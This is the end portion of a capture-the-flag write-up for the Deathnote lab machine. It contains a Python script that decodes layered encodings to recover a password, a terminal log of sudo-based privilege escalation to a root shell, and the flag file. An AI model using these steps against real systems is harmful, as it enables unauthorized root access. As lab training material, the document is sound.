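            raw = decoder(text)
            if raw is not None and _printable(raw):
                layers.append(name)
                text = raw.decode("ascii")
                break
        else:
            break  # no decoder produced printable text: this is the plaintext
    return layers, text


if __name__ == "__main__":
    for label, blob in (("case.wav", CASE_WAV), ("kira.txt", KIRA_TXT)):
        layers, plain = peel(blob)
        print(f"{label}: {' -> '.join(layers) or 'plain'}\n{plain}\n")
```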
It is easy to guess that this is kira's password:
kira@deathnote:/opt/L/kira-case$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/kira-case$ sudo /bin/bash
root@deathnote:/opt/L/kira-case# cd /root
root@deathnote:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Sep 4 2021 .
drwxr-xr-x 18 root root 4.0K Jul 19 2021 ..
-rw------- 1 root root 35 Sep 4 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 19 2021 .local
-rw------- 1 root root 190 Jul 19 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 957 Jul 19 2021 root.txt
root@deathnote:~# cat root.txt
:::::::: :::::::: :::: ::: :::::::: ::::::::: ::: ::::::::::: ::::::::
:+: :+: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#+ +:+ +#+ +:+ +#+ :#: +#++:++#: +#++:++#++: +#+ +#++:++#++
+#+ +#+ +#+ +#+ +#+#+# +#+ +#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######## ######## ### #### ######## ### ### ### ### ### ########
##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~#
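Privilege escalation succeeded and the flag was obtained.
Lessons learned
- This target seems to provide hints all the way through, but accessing the /robots.txt file returned "not found"; when that happens, try a command-line tool such as curl.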